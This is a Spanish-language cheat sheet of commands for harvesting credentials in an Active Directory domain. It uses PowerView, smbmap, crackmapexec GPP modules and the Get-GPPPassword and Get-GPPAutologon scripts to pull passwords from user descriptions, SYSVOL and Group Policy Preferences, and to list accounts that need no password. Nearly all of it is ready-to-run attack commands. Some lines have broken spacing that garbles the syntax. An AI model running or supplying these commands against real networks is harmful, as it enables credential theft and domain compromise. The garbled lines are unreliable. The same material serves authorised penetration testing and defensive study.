Campo descripción de los usuarios
Copiar # PowerView
Get-DomainUser * | Select-Object SamAccountName , Description | Where-Object { $_.Description -ne $null }
Find-UserField - SearchField Description - SearchTerm "<search-pattern>"
Recursos compartidos y scripts en SYSVOL
Copiar smbmap -H < IP-address-D C > -d < ACME.LOCA L > -u < use r > -p < passwor d >
smbmap -H < IP-address-D C > -d < ACME.LOCA L > -u < use r > -p < passwor d > -R "SYSVOL"
Group Policy Preferences (GPP)
Copiar crackmapexec smb < IP-address-D C > -u < use r > -p < passwor d > -M gpp_password
crackmapexec smb < IP-address-D C > -u < use r > -p < passwor d > -M gpp_autologin
Copiar # Get-GPPPassword.ps1
Import-Module . \Get-GPPPassword.ps1
Get-GPPPassword
Get-GPPPassword | ForEach-Object { $_.passwords } | Sort-Object - Uniq
# Get-GPPAutologon.ps1
Import-Module . \Get-GPPAutologon.ps1
Get-GPPAutologon
Get-GPPAutologon | ForEach-Object { $_.passwords } | Sort-Object - Uniq
El usuario no está sujeto a la política de contraseñas, lo que significa que podría tener una contraseña más corta o ninguna contraseña (si se permiten contraseñas vacías en el dominio).
Copiar # PowerView
Get-DomainUser - UACFilter PASSWD_NOTREQD | Select-Object SamAccountName , UserAccountControl